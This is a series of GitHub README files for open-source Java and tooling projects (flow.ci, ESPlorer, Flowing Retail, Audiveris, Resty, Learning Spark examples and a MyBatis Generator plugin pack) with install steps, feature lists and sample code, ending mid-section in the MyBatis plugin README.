<h3 align="center"> <a href="https://flowci.github.io"> <img src="https://github.com/FlowCI/docs/raw/master/_images/logo.png" alt="Logo" width="100"> </a> </h3> <h3 align="center">A Simple & Powerful CI/CD Server</h3> <p align="center"> <a href="https://github.com/FlowCI/docs/blob/master/LICENSE"><img src="https://img.shields.io/github/license/flowci/flow-core-x"></a> <a href="https://github.com/FlowCI/flow-core-x/releases/"><img src="https://img.shields.io/github/v/release/flowci/flow-core-x"></a> <a href="https://github.com/FlowCI"><img alt="GitHub Org's stars" src="https://img.shields.io/github/stars/flowci"></a> <a href="https://hub.docker.com/u/flowci"><img alt="Docker Pulls" src="https://img.shields.io/docker/pulls/flowci/core"></a> </p> <div align="center"> </div> ## What is flow.ci? flow.ci is an open-source CI/CD automation server that designed for setting up a self-hosted CI/CD service with the easiest, fastest and most painless way. It supports high availability, multiple building environment, and scalability with dynamic agents. - __High Availability__ flow.ci is designed to work in the cloud -- public, private, or hybrid, it could be deployed with multiple instances, the configuration/jobs data on the node may not be lost when the instance fails. - __High Performance__ - __scaling__: auto scaling agents either on K8s cluster or Linux host - __parallel__: job steps can be executed in parallel on multiple agents - __cache__: cache anything to speed up the build - __Zero Configuration__ flow.ci tries to minimize the complexity of any configuration, the server could be started with three command lines. It also provides build templates of many programming languages, a job could be started just using it. - __Online Debugging__ flow.ci supports the online TTY terminal so that you could find out the problems in the running job from runtime terminal. - __Flexible Plugins__ Using plugins on flow.ci is quite simple, you just need type the plugin name in the step. Developing a plugin is also quite easy, you could use any language on your own plugin development. - __Flexible Runtime__ Each step or step group can be run either on any docker images or native os. ## Quick start > [Docker](https://docs.docker.com/install/) & [Docker-Compose](https://docs.docker.com/compose/install/) are required ```bash git clone https://github.com/FlowCI/docker.git flow-docker cd flow-docker ./server.sh start ``` ## Documentation + [English](https://flowci.github.io/#/en/) + [中文文档](https://flowci.github.io/#/cn/) Need Help? submit issue from [here](https://github.com/FlowCI/docs/issues) or send email to `flowci@foxmail.com` ## Templates [maven, npm, golang, ruby, android and more](https://github.com/FlowCI/templates) ## Architecture ![architecture](https://github.com/FlowCI/docs/raw/master/_images/architecture.png) ## Preview ![demo](https://github.com/FlowCI/docs/raw/master/_images/demo.gif)
Integrated Development Environment (IDE) for ESP8266 developers
# ESPlorer [![Build Actions Status](https://github.com/4refr0nt/ESPlorer/workflows/build/badge.svg)](https://github.com/4refr0nt/ESPlorer/actions) [![Join the chat at https://gitter.im/4refr0nt/ESPlorer](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/4refr0nt/ESPlorer?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) #### Integrated Development Environment (IDE) for ESP8266 developers ### Package Description The essential multiplatforms tools for any ESP8266 developer from luatool author’s, including a LUA for NodeMCU and MicroPython. Also, all AT commands are supported. Requires Java 8 or above. Download the latest and greatest one from [Oracle website](https://www.oracle.com/java/technologies/javase-downloads.html). ### Supported platforms - Windows(x86, x86-64) - Linux(x86, x86-64, ARM soft & hard float) - Solaris(x86, x86-64) - Mac OS X(x86, x86-64, PPC, PPC64) ### Detailed features list - Syntax highlighting LUA and Python code - Code editor color themes: default, dark, Eclipse, IDEA, Visual Studio - Undo/Redo editors features - Code Autocomplete (Ctrl+Space) - Smart send data to ESP8266 (without dumb send with fixed line delay), check correct answer from ESP8266 after every line. - Code snippets - Detailed logging - and more, more more… ### Discuss * [English esp8266.com](http://www.esp8266.com/viewtopic.php?f=22&t=882) * [Russian esp8266.ru](http://esp8266.ru/forum/threads/esplorer.34/) ### Home Page [http://esp8266.ru/ESPlorer/](http://esp8266.ru/esplorer/) ### Latest binaries download Check out [Releases](https://github.com/4refr0nt/ESPlorer/releases) ### Build from sources #### Windows ``` mvnw.cmd clean package ``` #### Linux / Mac OS ``` ./mvnw clean package ``` The build creates all-in-one executable `ESPlorer.jar` in the `target` folder. Then run the app: ``` java -jar target/ESPlorer.jar ```
Sample application demonstrating an order fulfillment system decomposed into multiple independant components (e.g. microservices). Showing concrete implementation alternatives using e.g. Java, Spring Boot, Apache Kafka, Camunda, Zeebe, ...
# Flowing Retail This sample application demonstrates a simple order fulfillment system, decomposed into multiple independent components (like _microservices_). The repository contains code for multiple implementation alternatives to allow a broad audience to understand the code and to compare alternatives. The [table below](#alternatives) lists these alternatives. The example respects learnings from **Domain Driven Design (DDD)**, Event Driven Architecture (EDA) and **Microservices (µS)** and is designed to give you hands-on access to these topics. **Note:** The code was written in order to be explained. Hence, I favored simplified code or copy & paste over production-ready code with generic solutions. **Don't consider the coding style best practice! It is purpose-written to be easily explainable code**. You can find more information on the concepts in the [Practical Process Automation](https://processautomationbook.com/) book with O'Reilly. Flowing retail simulates a very easy order fulfillment system: ![Events and Commands](docs/workflow-in-service.png) <a name = "alternatives"></a> ## Architecture and implementation alternatives The most fundamental choice is to select the **communication mechanism**: * **[Apache Kafka](kafka/)** as event bus (could be easily changed to messaging, e.g. RabbitMQ): [](docs/architecture.png) * **[REST](rest/)** communication between Services. * This example also shows how to do **stateful resilience patterns** like **stateful retries** leveraging a workflow engine. * **[Zeebe](zeebe/)** broker doing work distribution. After the communication mechanism, the next choice is the **workflow engine**: * **Camunda 8 (aka Zeebe)** and the **programming language**: * **Java** ## Storyline Flowing retail simulates a very easy order fulfillment system. The business logic is separated into the services shown above (shown as a [context map](https://www.infoq.com/articles/ddd-contextmapping)). ### Long running services and orchestration Some services are **long running** in nature - for example: the payment service asks customers to update expired credit cards. A workflow engine is used to persist and control these long running interactions. ### Workflows live within service boundaries Note that the state machine (_or workflow engine in this case_) is a library used **within** one service. If different services need a workflow engine they can run whatever engine they want. This way it is an autonomous team decision if they want to use a framework, and which one: ![Events and Commands](docs/workflow-in-service.png) ## Links and background reading * [Practical Process Automation](https://processautomationbook.com/) book * Introduction blog post: https://blog.bernd-ruecker.com/flowing-retail-demonstrating-aspects-of-microservices-events-and-their-flow-with-concrete-source-7f3abdd40e53 * InfoQ-Writeup "Events, Flows and Long-Running Services: A Modern Approach to Workflow Automation": https://www.infoq.com/articles/events-workflow-automation
Latest generation of Audiveris OMR engine
java open-source optical-music-recognition
![](https://github.com/Audiveris/docs/blob/master/images/SplashLogo.png) Logo by [Katka](https://www.facebook.com/katkastreetart/) # Audiveris - Open-source Optical Music Recognition The goal of an OMR application is to allow the end-user to transcribe a score image into its symbolic counterpart. This opens the door to its further use by many kinds of digital processing such as playback, music edition, searching, republishing, etc. The Audiveris application is built around the tight integration of two main components: an OMR engine and an OMR editor. - The OMR engine combines many techniques, depending on the type of entities to be recognized -- *ad-hoc* methods for lines, image morphological closing for beams, external OCR for texts, template matching for heads, neural network for all other fixed-size shapes. Significant progresses have been made, especially regarding poor-quality scores, but experience tells us that a 100% recognition ratio is simply out of reach in many cases. - The OMR editor thus comes into play to overcome engine weaknesses in convenient ways. The user can preselect processing switches to adapt the OMR engine before launching the transcription of the current score. Then the remaining mistakes can generally be quickly fixed via the manual editing of a few music symbols. ## Key characteristics * Good recognition efficiency on real-world quality scores (as those seen on [IMSLP][imslp] site) * Effective support for large scores (with up to hundreds of pages) * Convenient user-oriented interface to detect and correct most OMR errors * Available on Windows, Linux and MacOS * Open source The core of engine music information (OMR data) is fully documented and made publicly available, either directly via XML-based `.omr` project files or via the Java API of this software. Audiveris comes with an integrated exporter to write (a subset of) this OMR data into [MusicXML][musicxml] 4.0 format. In the future, other exporters are expected to build upon OMR data to support other target formats. ## Stable releases On a rather regular basis, typically every 6 to 12 months, a new release is made available on the dedicated [Audiveris Releases][releases] page. The goal of a release is to provide significant improvements, well tested and integrated, resulting in a software as easy as possible to install and use: - for **Windows**, an installer is provided on [Github][releases]; The installer comes with pre-installed Tesseract OCR languages ``deu``, ``eng``, ``fra`` and ``ita``. But **it requires Java version 17** or higher to be available in your environment. If no suitable Java version is found at runtime, a prompt will ask you install it. - for **Linux**, a flatpak package is provided on [Flathub](https://flathub.org/apps/org.audiveris.audiveris); The package comes with pre-installed Tesseract OCR languages ``deu``, ``eng``, ``fra`` and ``ita``. The needed Java environment is included in its packaging, therefore no Java installation is needed. - for **MacOS**, unfortunately, we have nothing similar yet [^macos] -- for now, you have to build from sources as described in the following section on [Development versions](#development-versions). See details in the related [handbook section][installation]. ## Development versions The Audiveris project is developed on GitHub, the site you are reading. Any one can download, build and run this software. The needed tools are ``git``, ``gradle`` and a Java Development Kit (``jdk``), as described in this [handbook section][sources]. There are two main branches in Audiveris project: - the ``master`` branch is GitHub default branch; we use it for releases, and only for them; To build from this branch, you will need a ``jdk`` for Java version **17** or higher. - the ``development`` branch is the one where all developments continuously take place; Periodically, when a release is to be made, we merge the development branch into the master branch; As of this writing, the source code on development branch requires a ``jdk`` for Java version **21**. See details in the [Wiki article][workflow] dedicated to the chosen development workflow. ## Further Information Users and Developers are advised to read Audiveris [User Handbook][handbook], and the more general [Wiki][audiveris-wiki] set of articles. [^macos]: If you wish to give a hand, you are more than welcome! [audiveris-wiki]: https://github.com/Audiveris/audiveris/wiki [handbook]: https://audiveris.github.io/audiveris/ [imslp]: https://imslp.org/ [installation]: https://audiveris.github.io/audiveris/_pages/install/README/ [musicxml]: http://www.musicxml.com/ [releases]: https://github.com/Audiveris/audiveris/releases [sources]: https://audiveris.github.io/audiveris/_pages/install/sources/ [workflow]: https://github.com/Audiveris/audiveris/wiki/Git-Workflow
The minimalist framework of RESTful(server and client) - Resty
activerecord httpclient java restful server web
Resty 一款极简的restful轻量级的web框架 =========== 更新说明 ---- - [x] feature/20170203 强化Stringer工具和让日志支持彩色输出方便开发者调试 [@t-baby](https://github.com/t-baby) ---- [![Join the chat at https://gitter.im/Dreampie/Resty](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/Dreampie/Resty?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [![Issue Stats](http://issuestats.com/github/Dreampie/Resty/badge/pr?style=flat)](http://issuestats.com/github/Dreampie/Resty) [![Issue Stats](http://issuestats.com/github/Dreampie/Resty/badge/issue?style=flat)](http://issuestats.com/github/Dreampie/Resty) <a href="http://dreampie.gitbooks.io/resty-chs/content/index.html" target="_blank">开发文档</a> 如果你还不是很了解restful,或者认为restful只是一种规范不具有实际意义,推荐一篇osc两年前的文章:[RESTful API 设计最佳实践](http://www.oschina.net/translate/best-practices-for-a-pragmatic-restful-api) 和 Infoq的一篇极其理论的文章 [理解本真的REST架构风格](http://www.infoq.com/cn/articles/understanding-restful-style) 虽然有点老,介绍的也很简单,大家权当了解,restful的更多好处,还请google 拥有jfinal/activejdbc一样的activerecord的简洁设计,使用更简单的restful框架 restful的api设计,是作为restful的服务端最佳选择(使用场景:客户端和服务端解藕,用于对静态的html客户端(mvvm等),ios,andriod等提供服务端的api接口) Java开发指南:[Java style guide](https://github.com/Dreampie/java-style-guide) Api设计指南:[Http api design](https://github.com/Dreampie/http-api-design-ZH_CN) Resty例子: [resty-samples](https://github.com/Dreampie/resty-samples)(纯接口) [resty-demo](https://github.com/Dreampie/resty-demo)(带界面) 如果你在考虑前后端分离方案,推荐resty+vuejs,https://github.com/Dreampie/vuejs2-demo 开发群: <a target="_blank" href="http://shang.qq.com/wpa/qunwpa?idkey=8fc9498714ebbc3675cc5a5035858004154ef4645ebc9c128dfd76688d32179b"><img border="0" src="http://pub.idqqimg.com/wpa/images/group.png" alt="极简Restful框架 - Resty" title="极简Restful框架 - Resty"></a> 其他开发者贡献的插件:[Beetl扩展(大鹏)](https://github.com/zhaopengme/Resty-ext) [Shiro扩展(zhoulieqing)](http://git.oschina.net/zhoulieqing/resty-shiro) [MongoPlugin(T-baby)](https://github.com/T-baby/MongoDB-Plugin) > 有兴趣一起维护该框架的,可以联系我,进入合作开发 > 规范:提前说明功能,新建分支 `feature/日期` 功能 `fix/日期` 修复 在readme里添加一个TODO list描述 > - [x] feature/20161228 a task list item done [@Dreampie](https://github.com/Dreampie) > - [ ] feature/20161229 a task list item todo [@Dreampie](https://github.com/Dreampie) > 注意代码2格缩进,最后所有合作者一起代码review,合格之后合并到master maven使用方式: 1. 添加依赖包 ```xml <dependency> <groupId>cn.dreampie</groupId> <artifactId>resty-route</artifactId> <version>1.3.1.SNAPSHOT</version> </dependency> ``` 2.如果使用带有SNAPSHOT后缀的包,请添加该仓库 ```xml <repositories> <repository> <id>oss-snapshots</id> <url>https://oss.sonatype.org/content/repositories/snapshots</url> <releases> <enabled>true</enabled> </releases> <snapshots> <enabled>true</enabled> </snapshots> </repository> </repositories> ``` 一、独有优点: ----------- 重大更新: 1.3.0更新内容: 使用jetty作为嵌入式热加载默认实现(只要java文件进行编译就会重新加载),resty-captcha验证码功能... 1.2.0更新内容:使用header来控制api版本,基于数据源的读写分离,更简单的tableSetting.[详情查看](http://www.oschina.net/news/68791/resty-1-2-0-snapshot) 1.1.0版本重大更新:快速接入spring,缓存,加密,header,XForwardedSupports等,[详情查看](http://www.oschina.net/news/67001/resty-1-1-0-snapshot) Record的时代已经到来,你完全不用使用任何的model来执行你的数据 ```java //创建record的执行器 针对sec_user表 并开启缓存 Record recordDAO = new Record("sec_user"); //使用当前数据源和表数据 new一个对象来保存数据 recordDAO.reNew().set("属性", "值").save(); Record r1 = recordDAO.reNew().set("属性", "值"); Record r2 = recordDAO.reNew().set("属性", "值"); //批量保存 recordDAO.save(r1, r2); //更新 r2.set("属性", "值").update() //查询全部 List<Record> records = recordDAO.findAll(); //条件查询 recordDAO.findBy(where,paras) //分页查询 Page<Record> records = recordDAO.paginateAll(); //根据id删除 recordDAO.deleteById("1"); //本次查询放弃使用cache recordDAO.unCache().findBy(where,paras); //把record的数据源切换到dsmName数据源上 recordDAO.useDS(dsmName).findBy(where,paras); //等等,完全摆脱model,实现快速操作数据 ``` Model支持动态切换数据源和本次查询放弃使用cache ```java User dao=new User(); //本次查询放弃使用cache dao.unCache().findBy(where,paras); //把model的数据源切换到dsmName数据源上 dao.useDS(dsmName).findBy(where,paras); ``` //数据库和全局参数配置移植到application.properties 详情参看resty-example ```java #not must auto load app.encoding=UTF-8 app.devEnable=true app.showRoute=false app.cacheEnabled=true #默认使用ehcacheProvider #app.cacheProvider=cn.dreampie.cache.redis.RedisProvider ##druid plugin auto load db.default.url=jdbc:mysql:// db.default.user=dev db.default.password=dev1010 db.default.dialect=mysql #c3p0配置 c3p0.default.minPoolSize=3 c3p0.default.maxPoolSize=20 #druid配置 #druid.default.initialSize=10 #druid.default.maxPoolPreparedStatementPerConnectionSize=20 #druid.default.timeBetweenConnectErrorMillis=1000 #druid.default.filters=slf4j,stat,wall #flyway database migration auto load flyway.default.valid.clean=true flyway.default.migration.auto=true flyway.default.migration.initOnMigrate=true db.demo.url=jdbc:mysql:// db.demo.user=dev db.demo.password=dev1010 db.demo.dialect=mysql #druid druid.demo.initialSize=10 druid.demo.maxPoolPreparedStatementPerConnectionSize=20 druid.demo.timeBetweenConnectErrorMillis=1000 druid.demo.filters=slf4j,stat,wall #flyway flyway.demo.valid.clean=true flyway.demo.migration.auto=true flyway.demo.migration.initOnMigrate=true //数据库的配置精简 自动从文件读取参数 只需配置model扫描目录 和dsmName public void configPlugin(PluginLoader pluginLoader) { //第一个数据库 ActiveRecordPlugin activeRecordPlugin = new ActiveRecordPlugin(new DruidDataSourceProvider("default"), true); activeRecordPlugin.addIncludePaths("cn.dreampie.resource"); pluginLoader.add(activeRecordPlugin); } ``` 1.极简的route设计,完全融入普通方法的方式,方法参数就是请求参数,方法返回值就是数据返回值 ```java @GET("/users/:name") //在路径中自定义解析的参数 如果有其他符合 也可以用 /users/{name} // 参数名就是方法变量名 除路径参数之外的参数也可以放在方法参数里 传递方式 user={json字符串} public Map find(String name,User user) { // return Lister.of(name); return Maper.of("k1", "v1,name:" + name, "k2", "v2"); //返回什么数据直接return } ``` 2.极简的activerecord设计,数据操作只需短短的一行,支持批量保存对象 ```java //批量保存 User u1 = new User().set("username", "test").set("providername", "test").set("password", "123456"); User u2 = new User().set("username", "test").set("providername", "test").set("password", "123456"); User.dao.save(u1,u2); //普通保存 User u = new User().set("username", "test").set("providername", "test").set("password", "123456"); u.save(); //更新 u.update(); //条件更新 User.dao.updateBy(columns,where,paras); User.dao.updateAll(columns,paras); //删除 u.deleted(); //条件删除 User.dao.deleteBy(where,paras); User.dao.deleteAll(); //查询 User.dao.findById(id); User.dao.findBy(where,paras); User.dao.findAll(); //分页 User.dao.paginateBy(pageNumber,pageSize,where,paras); User.dao.paginateAll(pageNumber,pageSize); ``` 3.极简的客户端设计,支持各种请求,文件上传和文件下载(支持断点续传) ```java Client httpClient=null;//创建客户端对象 //启动resty-example项目,即可测试客户端 String apiUrl = "http://localhost:8081/api/v1.0"; //如果不需要 使用账号登陆 //httpClient = new Client(apiUrl); //如果有账号权限限制 需要登陆 httpClient = new Client(apiUrl, "/tests/login", "u", "123"); //该请求必须 登陆之后才能访问 未登录时返回 401 未认证 ClientRequest authRequest = new ClientRequest("/users"); ClientResult authResult = httpClient.build(authRequest).get(); System.out.println(authResult.getResult()); //get ClientRequest getRequest = new ClientRequest("/tests"); ClientResult getResult = httpClient.build(getRequest).get(); System.out.println(getResult.getResult()); //post ClientRequest postRequest = new ClientRequest("/tests"); postRequest.addParam("test", Jsoner.toJSONString(Maper.of("a", "谔谔"))); ClientResult postResult = httpClient.build(postRequest).post(); System.out.println(postResult.getResult()); //put ClientRequest putRequest = new ClientRequest("/tests/x"); ClientResult putResult = httpClient.build(putRequest).put(); System.out.println(putResult.getResult()); //delete ClientRequest deleteRequest = new ClientRequest("/tests/a"); ClientResult deleteResult = httpClient.build(deleteRequest).delete(); System.out.println(deleteResult.getResult()); //upload ClientRequest uploadRequest = new ClientRequest("/tests/resty"); uploadRequest.addUploadFiles("resty", ClientTest.class.getResource("/resty.jar").getFile()); uploadRequest.addParam("des", "test file paras 测试笔"); ClientResult uploadResult = httpClient.build(uploadRequest).post(); System.out.println(uploadResult.getResult()); //download 支持断点续传 ClientRequest downloadRequest = new ClientRequest("/tests/file"); downloadRequest.setDownloadFile(ClientTest.class.getResource("/resty.jar").getFile().replace(".jar", "x.jar")); ClientResult downloadResult = httpClient.build(downloadRequest).get(); System.out.println(downloadResult.getResult()); ``` 4.支持多数据源和嵌套事务(使用场景:需要访问多个数据库的应用,或者作为公司内部的数据中间件向客户端提供数据访问api等) ```java // 在resource里使用事务,也就是controller里,rest的世界认为所以的请求都表示资源,所以这儿叫resource @GET("/users") @Transaction(name = {"default", "demo"}) //多数据源的事务,如果你只有一个数据库 直接@Transaction 不需要参数 public User transaction() { //TODO 用model执行数据库的操作 只要有操作抛出异常 两个数据源 都会回滚 虽然不是分布式事务 也能保证代码块的数据执行安全 } // 如果你需要在service里实现事务,通过java动态代理(必须使用接口,jdk设计就是这样) public interface UserService { @Transaction(name = {"demo"})//service里添加多数据源的事务,如果你只有一个数据库 直接@Transaction 不需要参数 public User save(User u); } // 在resource里使用service层的 事务 // @Transaction(name = {"demo"})的注解需要写在service的接口上 // 注意java的自动代理必须存在接口 // TransactionAspect 是事务切面 ,你也可以实现自己的切面比如日志的Aspect,实现Aspect接口 // 再private UserService userService = AspectFactory.newInstance(new UserServiceImpl(), new TransactionAspect(),new LogAspect()); private UserService userService = AspectFactory.newInstance(new UserServiceImpl(), new TransactionAspect()); ``` 5.极简的权限设计,可以通过cache支持分布式session,你只需要实现一个简单接口和添加一个拦截器,即可实现基于url的权限设计 ```java public void configInterceptor(InterceptorLoader interceptorLoader) { //权限拦截器 放在第一位 第一时间判断 避免执行不必要的代码 interceptorLoader.add(new SecurityInterceptor(new MyAuthenticateService())); } //实现接口 public class MyAuthenticateService implements AuthenticateService { //登陆时 通过name获取用户的密码和权限信息 public Principal findByName(String name) { DefaultPasswordService defaultPasswordService = new DefaultPasswordService(); Principal principal = new Principal(name, defaultPasswordService.hash("123"), new HashSet<String>() {{ add("api"); }}); return principal; } //基础的权限总表 所以的url权限都放在这儿 你可以通过 文件或者数据库或者直接代码 来设置所有权限 public Set<Credential> loadAllCredentials() { Set<Credential> credentials = new HashSet<Credential>(); credentials.add(new Credential("GET", "/api/v1.0/users**", "users")); return credentials; } } ``` 6.极简的缓存设计,可扩展,非常简单即可启用model的自动缓存功能 ```java //启用缓存并在要自动使用缓存的model上 //config application.properties app.cacheEnabled=true //开启缓存@Table(name = "sec_user", cached = true) @Table(name = "sec_user", cached = true) public class User extends Model<User> { public static User dao = new User(); } ``` 7.下载文件,只需要直接return file ```java @GET("/files") public File file() { return new File(path); } ``` 8.上传文件,注解配置把文件写到服务器 ```java @POST("/files") @FILE(dir = "/upload/") //配置上传文件的相关信息 public UploadedFile file(UploadedFile file) { return file; } ``` 9.当然也是支持传统的web开发,你可以自己实现数据解析,在config里添加自定义的解析模板 ```java public void configConstant(ConstantLoader constantLoader) { // 通过后缀来返回不同的数据类型 你可以自定义自己的 render 如:FreemarkerRender //默认已添加json和text的支持,只需要把自定义的Render add即可 // constantLoader.addRender("json", new JsonRender()); } ``` 二、运行example示例: ----------------- 1.在本地mysql数据库里创建demo,example数据库,对应application.properties的数据库配置 2.运行resty-example下的pom.xml->flyway-maven-plugin:migrate,自动根具resources下db目录下的数据库文件生成数据库表结构 3.运行resty-example下的pom.xml->tomcat6-maven-plugin:run,启动example程序 提醒:推荐idea作为开发ide,使用分模块的多module开发 License <a href="https://www.apache.org/licenses/LICENSE-2.0" target="_blank">Apache License V2</a> 捐赠: [支付宝](https://raw.githubusercontent.com/Dreampie/Resty/master/alipay.png)
Example code from Learning Spark book
[![buildstatus](https://travis-ci.org/holdenk/learning-spark-examples.svg?branch=master)](https://travis-ci.org/holdenk/learning-spark-examples) Examples for Learning Spark =============== Examples for the Learning Spark book. These examples require a number of libraries and as such have long build files. We have also added a stand alone example with minimal dependencies and a small build file in the mini-complete-example directory. These examples have been updated to run against Spark 1.3 so they may be slightly different than the versions in your copy of "Learning Spark". Requirements == * JDK 1.7 or higher * Scala 2.10.3 - scala-lang.org * Spark 1.3 * Protobuf compiler - On debian you can install with sudo apt-get install protobuf-compiler * R & the CRAN package Imap are required for the ChapterSixExample * The Python examples require urllib3 Python examples === From spark just run ./bin/pyspark ./src/python/[example] Spark Submit === You can also create an assembly jar with all of the dependencies for running either the java or scala versions of the code and run the job with the spark-submit script ./sbt/sbt assembly OR mvn package cd $SPARK_HOME; ./bin/spark-submit --class com.oreilly.learningsparkexamples.[lang].[example] ../learning-spark-examples/target/scala-2.10/learning-spark-examples-assembly-0.0.1.jar [![Learning Spark](http://akamaicovers.oreilly.com/images/0636920028512/cat.gif)](http://www.jdoqocy.com/click-7645222-11260198?url=http%3A%2F%2Fshop.oreilly.com%2Fproduct%2F0636920028512.do%3Fcmp%3Daf-strata-books-videos-product_cj_9781449358600_%2525zp&cjsku=0636920028512)
Mybatis Generator 代码生成插件拓展,增加:查询单条数据插件(SelectOneByExamplePlugin)、MySQL分页插件(LimitPlugin)、数据Model链式构建插件(ModelBuilderPlugin)、Example Criteria 增强插件(ExampleEnhancedPlugin)、Example 目标包修改插件(ExampleTargetPlugin)、批量插入插件(BatchInsertPlugin)、逻辑删除插件(LogicalDeletePlugin)、数据Model属性对应Column获取插件(ModelColumnPlugin)、存在即更新(UpsertPlugin)、Selective选择插入更新增强插件(SelectiveEnhancedPlugin)、Table增加前缀插件(TableSuffixPlugin)、自定义注释插件(CommentPlugin)、增量插件(IncrementsPlugin)、查询结果选择性返回插件(SelectSelectivePlugin)、乐观锁插件(OptimisticLockerPlugin)、LombokPlugin等拓展。
batchinsert limit lombok mybatis mybatis-generator mysql plugin selectone upsert
# 这是 MyBatis Generator 插件的拓展插件包 应该说使用Mybatis就一定离不开[MyBatis Generator](https://github.com/mybatis/generator)这款代码生成插件,而这款插件自身还提供了插件拓展功能用于强化插件本身,官方已经提供了一些[拓展插件](http://www.mybatis.org/generator/reference/plugins.html),本项目的目的也是通过该插件机制来强化Mybatis Generator本身,方便和减少我们平时的代码开发量。 >因为插件是本人兴之所至所临时发布的项目(本人已近三年未做JAVA开发,代码水平请大家见谅),但基本插件都是在实际项目中经过检验的请大家放心使用,但因为项目目前主要数据库为MySQL,Mybatis实现使用Mapper.xml方式,所以代码生成时对于其他数据库和注解方式的支持未予考虑,请大家见谅。 >V1.3.x版本的测试基准基于mybatis-3.5.0,同时向下兼容V3.4.0(某些插件需要context节点配置mybatis版本信息[[issues#70](https://github.com/itfsw/mybatis-generator-plugin/issues/70)])。老版本参见分支[V1.2.x](https://github.com/itfsw/mybatis-generator-plugin/tree/V1.2); ```xml <context> <!-- 解决 批量插入插件(BatchInsertPlugin)在mybatis3.5.0以下版本无法返回自增主键的问题 指定mybatis版本,让插件指定您所使用的mybatis版本生成对应代码 --> <property name="mybatisVersion" value="3.4.0"/> </context> ``` --------------------------------------- 插件列表: * [查询单条数据插件(SelectOneByExamplePlugin)](#1-查询单条数据插件) * [MySQL分页插件(LimitPlugin)](#2-mysql分页插件) * [数据Model链式构建插件(ModelBuilderPlugin)](#3-数据model链式构建插件) * [Example Criteria 增强插件(ExampleEnhancedPlugin)](#4-example-增强插件exampleandiforderby) * [Example 目标包修改插件(ExampleTargetPlugin)](#5-example-目标包修改插件) * [批量插入插件(BatchInsertPlugin)](#6-批量插入插件) * [逻辑删除插件(LogicalDeletePlugin)](#7-逻辑删除插件) * [数据Model属性对应Column获取插件(ModelColumnPlugin)](#8-数据model属性对应column获取插件) * [存在即更新插件(UpsertPlugin)](#9-存在即更新插件) * [Selective选择插入更新增强插件(SelectiveEnhancedPlugin)](#10-selective选择插入更新增强插件) * [~~Table增加前缀插件(TablePrefixPlugin)~~](#11-table增加前缀插件) * [~~Table重命名插件(TableRenamePlugin)~~](#12-table重命名插件) * [自定义注释插件(CommentPlugin)](#13-自定义注释插件) * [~~增量插件(IncrementsPlugin)~~](#14-增量插件) * [查询结果选择性返回插件(SelectSelectivePlugin)](#15-查询结果选择性返回插件) * [~~官方ConstructorBased配置BUG临时修正插件(ConstructorBasedBugFixPlugin)~~](#16-官方constructorbased配置bug临时修正插件) * [乐观锁插件(OptimisticLockerPlugin)](#17-乐观锁插件) * [表重命名配置插件(TableRenameConfigurationPlugin)](#18-表重命名配置插件) * [Lombok插件(LombokPlugin)](#19-Lombok插件) * [数据ModelCloneable插件(ModelCloneablePlugin)](#20-数据ModelCloneable插件) * [状态枚举生成插件(EnumTypeStatusPlugin)](#21-状态枚举生成插件) * [增量插件(IncrementPlugin)](#22-增量插件) * [Mapper注解插件(MapperAnnotationPlugin)](#23-Mapper注解插件) --------------------------------------- Maven引用: ```xml <dependency> <groupId>com.itfsw</groupId> <artifactId>mybatis-generator-plugin</artifactId> <version>1.3.10</version> </dependency> ``` --------------------------------------- MyBatis Generator 参考配置(插件依赖应该配置在mybatis-generator-maven-plugin插件依赖中[[issues#6]](https://github.com/itfsw/mybatis-generator-plugin/issues/6)) ```xml <!-- mybatis-generator 自动代码插件 --> <plugin> <groupId>org.mybatis.generator</groupId> <artifactId>mybatis-generator-maven-plugin</artifactId> <version>1.3.7</version> <configuration> <!-- 配置文件 --> <configurationFile>src/main/resources/mybatis-generator.xml</configurationFile> <!-- 允许移动和修改 --> <verbose>true</verbose> <overwrite>true</overwrite> </configuration> <dependencies> <!-- jdbc 依赖 --> <dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java</artifactId> <version>${mysql.driver.version}</version> </dependency> <dependency> <groupId>com.itfsw</groupId> <artifactId>mybatis-generator-plugin</artifactId> <version>${mybatis.generator.plugin.version}</version> </dependency> </dependencies> </plugin> ``` --------------------------------------- gradle集成[[issues#41]](https://github.com/itfsw/mybatis-generator-plugin/issues/41)),感谢[masa-kunikata](https://github.com/masa-kunikata)提供的脚本。 ```gradle // https://gist.github.com/masa-kunikata/daaf0f51a8ab9b808f61805407e1654c buildscript { repositories { maven { url "https://plugins.gradle.org/m2/" } } dependencies { classpath "gradle.plugin.com.arenagod.gradle:mybatis-generator-plugin:1.4" } } apply plugin: 'java-library' apply plugin: "com.arenagod.gradle.MybatisGenerator" apply plugin: 'eclipse' sourceCompatibility = 1.8 targetCompatibility = 1.8 def mybatisGeneratorCore = 'org.mybatis.generator:mybatis-generator-core:1.3.7' def itfswMybatisGeneratorPlugin = 'com.itfsw:mybatis-generator-plugin:1.3.9' mybatisGenerator { verbose = false configFile = "config/mybatisGenerator/generatorConfig.xml" dependencies { mybatisGenerator project(':') mybatisGenerator itfswMybatisGeneratorPlugin mybatisGenerator mybatisGeneratorCore } } repositories { mavenCentral() } dependencies { compile mybatisGeneratorCore compile itfswMybatisGeneratorPlugin testCompile 'junit:junit:4.12' } def defaultEncoding = 'UTF-8' compileJava { options.encoding = defaultEncoding } compileTestJava { options.encoding = defaultEncoding } ``` --------------------------------------- ### 1. 查询单条数据插件 对应表Mapper接口增加了方法 插件: ```xml <!-- 查询单条数据插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.SelectOneByExamplePlugin"/> ``` 使用: ```java public interface TbMapper { /** * This method was generated by MyBatis Generator. * This method corresponds to the database table tb * * @mbg.generated * @project https://github.com/itfsw/mybatis-generator-plugin */ Tb selectOneByExample(TbExample example); /** * This method was generated by MyBatis Generator. * This method corresponds to the database table tb * * @mbg.generated * @project https://github.com/itfsw/mybatis-generator-plugin */ // Model WithBLOBs 时才有 TbWithBLOBs selectOneByExampleWithBLOBs(TbExample example); } ``` ### 2. MySQL分页插件 对应表Example类增加了Mysql分页方法,limit(Integer rows)、limit(Integer offset, Integer rows)和page(Integer page, Integer pageSize) >warning: 分页默认从0开始,目前网上流行的大多数前端框架分页都是从0开始,插件保持这种方式(可通过配置startPage参数修改); 插件: ```xml <!-- MySQL分页插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.LimitPlugin"> <!-- 